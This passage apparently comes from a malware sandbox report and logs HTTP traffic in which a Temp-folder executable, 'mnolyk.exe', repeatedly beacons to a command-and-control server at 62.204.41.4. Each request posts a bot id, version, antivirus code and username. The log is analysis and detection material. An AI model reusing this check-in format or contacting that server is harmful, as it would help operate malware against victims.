                                                                      Feb 7, 2023 23:08:16.857755899 CET | 393 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      279 | 192.168.2.7 | 49974 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:17.631578922 CET | 394 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:17.696517944 CET | 394 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      28 | 192.168.2.7 | 49722 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:08.360518932 CET | 132 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:08.425359964 CET | 132 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      280 | 192.168.2.7 | 49975 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:18.409780025 CET | 395 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:18.474836111 CET | 395 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      281 | 192.168.2.7 | 49976 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:18.678575993 CET | 396 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:18.742882013 CET | 396 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      282 | 192.168.2.7 | 49977 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:18.914834976 CET | 397 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:18.980144978 CET | 397 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      283 | 192.168.2.7 | 49978 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:19.152479887 CET | 398 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:19.216840982 CET | 398 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      284 | 192.168.2.7 | 49979 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:19.443583965 CET | 399 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:19.507155895 CET | 399 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      285 | 192.168.2.7 | 49980 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:19.678958893 CET | 400 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:19.741760015 CET | 400 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      286 | 192.168.2.7 | 49981 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:19.921142101 CET | 401 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:19.985157013 CET | 401 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      287 | 192.168.2.7 | 49982 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:20.169197083 CET | 402 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:20.232326984 CET | 402 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      288 | 192.168.2.7 | 49983 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:20.411479950 CET | 403 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:20.473516941 CET | 403 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      289 | 192.168.2.7 | 49984 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:20.651521921 CET | 404 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:20.715797901 CET | 404 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      29 | 192.168.2.7 | 49723 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:08.598237991 CET | 133 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:08.660135984 CET | 133 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      290 | 192.168.2.7 | 49985 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:20.913009882 CET | 405 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:20.976932049 CET | 405 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      291 | 192.168.2.7 | 49986 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:21.156436920 CET | 406 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:21.219510078 CET | 406 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      292 | 192.168.2.7 | 49987 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:21.404062986 CET | 407 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:21.467391968 CET | 407 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      293 | 192.168.2.7 | 49988 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:21.653563976 CET | 408 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:21.719542027 CET | 408 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      294 | 192.168.2.7 | 49989 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:21.900932074 CET | 409 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:21.967075109 CET | 409 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      295 | 192.168.2.7 | 49990 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:22.153608084 CET | 410 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
